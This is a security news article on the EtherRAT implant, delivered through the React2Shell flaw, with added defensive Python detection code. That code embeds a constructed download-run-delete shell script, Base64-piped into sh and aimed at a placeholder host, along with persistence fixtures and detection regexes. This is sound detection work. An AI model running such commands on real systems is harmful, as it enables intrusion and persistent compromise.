North Korea-linked actors exploit React2Shell flaw to deploy EtherRAT using Ethereum-based C2

Researchers at the cloud security firm Sysdig said that threat actors with ties to North Korea have likely exploited a critical React Server Components vulnerability to deliver a previously undocumented remote access trojan dubbed EtherRAT.

The attack chain begins with exploitation of CVE-2025-55182 to execute a Base64-encoded shell command that downloads and runs a shell script. The script attempts retrieval with curl and falls back to wget or python3, prepares the environment by downloading Node.js v20.10.0 from nodejs.org, writes an encrypted blob and an obfuscated JavaScript dropper to disk, removes the initial shell script to reduce forensic traces and launches the dropper.
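From the detection side, the shape of this first stage (a Base64 blob decoded straight into a shell, a curl/wget/python3 fallback chain, execution of the dropped file, then deletion of the script) is what a process-telemetry rule can key on. The following is an added Python example, not code from Sysdig or from the article: it triages constructed process command lines, decodes any Base64 that is piped into `sh`/`bash`, and scores the decoded script against those traits. The inner script, the `example.invalid` URL and the `/tmp/.s` path are constructed placeholders, not indicators from the report.

```python
import base64
import re

# Constructed inner script in the shape the article describes (curl, then
# wget, then python3 as fallbacks; run the file; delete it). Placeholder URL.
INNER_SCRIPT = """
u=http://example.invalid/s.sh
curl -fsSL "$u" -o /tmp/.s || wget -qO /tmp/.s "$u" || python3 -c 'import urllib.request;urllib.request.urlretrieve("'"$u"'","/tmp/.s")'
sh /tmp/.s
rm -f /tmp/.s
"""
B64 = base64.b64encode(INNER_SCRIPT.encode()).decode()

# Constructed sample command lines: one benign decode, one decode-to-shell, one plain app.
SAMPLE_CMDLINES = [
    "sh -c 'echo aGVsbG8= | base64 -d > /tmp/out'",
    f"sh -c 'echo {B64} | base64 -d | sh'",
    "node /srv/app/server.js",
]

# "base64 -d | sh" (or bash / --decode) anywhere in the command line.
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
# Long runs of Base64 alphabet worth trying to decode.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Traits of the decoded script that match the stage-one behaviour described above.
INDICATORS = {
    "downloader_fallback": re.compile(r"curl\b.*\|\|\s*wget\b|wget\b.*\|\|\s*python3\b", re.S),
    "execute_dropped_file": re.compile(r"\b(?:ba)?sh\s+/tmp/|chmod\s+\+x"),
    "self_delete": re.compile(r"\brm\s+-f\b"),
}


def analyze_cmdline(cmdline: str) -> dict:
    """Return whether the command decodes Base64 into a shell and which traits the payload shows."""
    result = {"decodes_to_shell": False, "indicators": []}
    if not DECODE_TO_SHELL.search(cmdline):
        return result
    result["decodes_to_shell"] = True
    for token in B64_TOKEN.findall(cmdline):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not real Base64, skip it
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(decoded):
                result["indicators"].append(name)
    return result


def triage(cmdlines):
    """Keep only command lines whose decoded payload shows at least one stage-one trait."""
    return [c for c in cmdlines if analyze_cmdline(c)["indicators"]]


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(analyze_cmdline(c))
```

Decoding the payload rather than matching on the raw command line is what makes this robust to re-encoding: the outer command looks the same for every variant, while the decoded script carries the behaviour.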

EtherRAT uses an unusual command-and-control resolution technique that relies on Ethereum smart contracts and a consensus mechanism across nine public Ethereum RPC endpoints. The implant fetches the C2 server URL from the contract every five minutes, querying the endpoints in parallel and selecting the URL returned by the majority to defend against single-endpoint compromise or researcher manipulation.
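The resolution scheme leaves a network-level fingerprint a defender can look for without knowing the contract or the C2 address: one process fanning out to a fixed set of RPC hosts in a tight burst, repeating at a constant period, and then (per the next paragraph) polling a single host at a tight fixed cadence. The following is an added Python example, not Sysdig's detection logic: it runs two heuristics over constructed flow records. The `example.invalid` hostnames, the pids and the timings are all constructed; the 300 s and 0.5 s periods are taken from the article.

```python
from collections import defaultdict
from statistics import median

# Constructed flow records: (time in seconds, pid, destination host).
# pid 4242 models the implant (nine-host burst every 300 s, then 0.5 s polling);
# pid 1001 models an ordinary web app with irregular traffic.
RPC_HOSTS = [f"rpc{i}.example.invalid" for i in range(1, 10)]


def build_sample_flows():
    flows = []
    for k in range(4):                                  # four resolution rounds, 300 s apart
        base = 1000.0 + 300 * k
        for i, host in enumerate(RPC_HOSTS):
            flows.append((base + 0.05 * i, 4242, host))  # parallel queries, ~50 ms apart
    for n in range(40):                                 # 0.5 s task polling of the resolved host
        flows.append((1010.0 + 0.5 * n, 4242, "c2.example.invalid"))
    benign = ["db.example.invalid", "cdn.example.invalid", "api.example.invalid"] * 5
    for n, host in enumerate(benign):
        flows.append((1000.0 + 37.0 * n + (n % 3) * 11, 1001, host))
    return sorted(flows)


def _is_periodic(times, tolerance):
    """True when every gap between consecutive times is within tolerance*median of the median gap."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return False, None
    m = median(gaps)
    return all(abs(g - m) <= tolerance * m for g in gaps), m


def find_fanout_beacons(flows, min_hosts=5, window=2.0, tolerance=0.1):
    """Flag pids that repeatedly contact many distinct hosts within `window` seconds at a fixed period."""
    by_pid = defaultdict(list)
    for t, pid, host in flows:
        by_pid[pid].append((t, host))
    hits = {}
    for pid, events in by_pid.items():
        events.sort()
        bursts = []                                     # list of (burst_start, set_of_hosts)
        for t, host in events:
            if bursts and t - bursts[-1][0] <= window:
                bursts[-1][1].add(host)
            else:
                bursts.append((t, {host}))
        fanouts = [(t, hosts) for t, hosts in bursts if len(hosts) >= min_hosts]
        periodic, period = _is_periodic([t for t, _ in fanouts], tolerance)
        if periodic:
            hits[pid] = {"rounds": len(fanouts),
                         "period_s": round(period, 1),
                         "hosts": len(set().union(*(h for _, h in fanouts)))}
    return hits


def find_fast_pollers(flows, max_gap=1.0, min_events=20, tolerance=0.1):
    """Flag (pid, host) pairs contacted many times at a tight, constant cadence."""
    by_pair = defaultdict(list)
    for t, pid, host in flows:
        by_pair[(pid, host)].append(t)
    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue
        periodic, period = _is_periodic(sorted(times), tolerance)
        if periodic and period <= max_gap:
            hits[pair] = {"events": len(times), "period_s": period}
    return hits


if __name__ == "__main__":
    sample = build_sample_flows()
    print(find_fanout_beacons(sample))
    print(find_fast_pollers(sample))
```

The fan-out heuristic is the more durable of the two, because the majority vote requires the implant to hit several endpoints close together every round; the endpoints themselves are public RPC providers, so hostname blocklists alone would also break legitimate applications.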

Once connected to a C2 server, the malware polls every 500 milliseconds and treats any response longer than 10 characters as JavaScript to execute. It implements five separate Linux persistence mechanisms – a systemd user service, an XDG autostart entry, cron jobs, .bashrc injection and profile injection – and can self-update by sending its source to an API endpoint, receiving a differently obfuscated but functionally identical payload, overwriting itself and launching the new code.
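Five independent persistence hooks mean a cleanup that removes only the first one found leaves the implant in place, so an incident responder needs to sweep all five locations at once. The following is an added Python example, not Sysdig's tooling: it audits a user's systemd units, XDG autostart entries, crontab, `.bashrc` and `.profile` for entries that run Node.js, run something out of a hidden directory, or background a command from a shell rc file. The sample home directory, the `/home/u/.cache/...` paths and the crontab text are constructed for the example and are not paths from the report; `crontab_text` is assumed to be the output of `crontab -l` supplied by the caller.

```python
import re
import tempfile
from pathlib import Path

# Constructed heuristics: runs node, runs from a hidden directory, or backgrounds a process.
NODE = re.compile(r"\b(?:node|nodejs)\b")
HIDDEN_DIR = re.compile(r"/\.[A-Za-z0-9_-]+/")


def looks_suspicious(cmd: str) -> bool:
    return bool(NODE.search(cmd) or HIDDEN_DIR.search(cmd)
                or "nohup" in cmd or cmd.rstrip().endswith("&"))


def _scan_lines(label, text, key_pattern=None):
    """Scan non-comment lines (optionally only those matching key_pattern) and report suspicious ones."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if key_pattern and not key_pattern.match(s):
            continue
        if looks_suspicious(s):
            findings.append({"where": label, "line": lineno, "text": s})
    return findings


def audit_persistence(home: Path, crontab_text: str = "") -> list:
    """Sweep the five user-level persistence locations named in the article under `home`."""
    findings = []
    units = home / ".config/systemd/user"
    if units.is_dir():
        for svc in sorted(units.glob("*.service")):
            findings += _scan_lines(f"systemd:{svc.name}", svc.read_text(), re.compile(r"ExecStart="))
    autostart = home / ".config/autostart"
    if autostart.is_dir():
        for desk in sorted(autostart.glob("*.desktop")):
            findings += _scan_lines(f"autostart:{desk.name}", desk.read_text(), re.compile(r"Exec="))
    findings += _scan_lines("crontab", crontab_text)
    for rc in (".bashrc", ".profile"):
        path = home / rc
        if path.is_file():
            findings += _scan_lines(rc, path.read_text())
    return findings


# Constructed fixture: one suspicious entry per mechanism plus benign noise.
IMPLANT_CMD = "/home/u/.cache/nodejs/bin/node /home/u/.cache/app/main.js"
SAMPLE_CRONTAB = f"0 3 * * * /usr/local/bin/backup.sh\n*/5 * * * * {IMPLANT_CMD}\n"


def make_sample_home() -> Path:
    home = Path(tempfile.mkdtemp())
    (home / ".config/systemd/user").mkdir(parents=True)
    (home / ".config/autostart").mkdir(parents=True)
    (home / ".config/systemd/user/sync.service").write_text(
        "[Service]\nExecStart=/usr/bin/syncthing serve\n")
    (home / ".config/systemd/user/update.service").write_text(
        f"[Service]\nExecStart={IMPLANT_CMD}\n")
    (home / ".config/autostart/update.desktop").write_text(
        f"[Desktop Entry]\nType=Application\nExec={IMPLANT_CMD}\n")
    (home / ".bashrc").write_text(
        f'alias ll="ls -la"\nnohup {IMPLANT_CMD} >/dev/null 2>&1 &\n')
    (home / ".profile").write_text(
        f'export PATH="$HOME/bin:$PATH"\n({IMPLANT_CMD} &)\n')
    return home


if __name__ == "__main__":
    for f in audit_persistence(make_sample_home(), SAMPLE_CRONTAB):
        print(f"{f['where']}:{f['line']}: {f['text']}")
```

On a real host the function would be called with `Path.home()` and the captured `crontab -l` output; the point of returning every hit rather than stopping at the first is that all five entries must be removed together, along with the dropped Node.js runtime they reference, or the next login or cron tick restarts the implant.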

The activity shows overlap with a long-running campaign known as Contagious Interview that targets blockchain and Web3 developers through fake job interviews, coding assignments and cloned repositories. Analysis by OpenSourceMalware revealed variants that instruct victims to open malicious projects in Visual Studio Code, where a configured tasks.json file can trigger a loader automatically on folder open and fetch subsequent payloads.

Sysdig characterized EtherRAT as a significant evolution in React2Shell exploitation that shifts activity toward persistent, stealthy access intended for long-term operations, and warned defenders that the implant resists traditional detection and takedown approaches.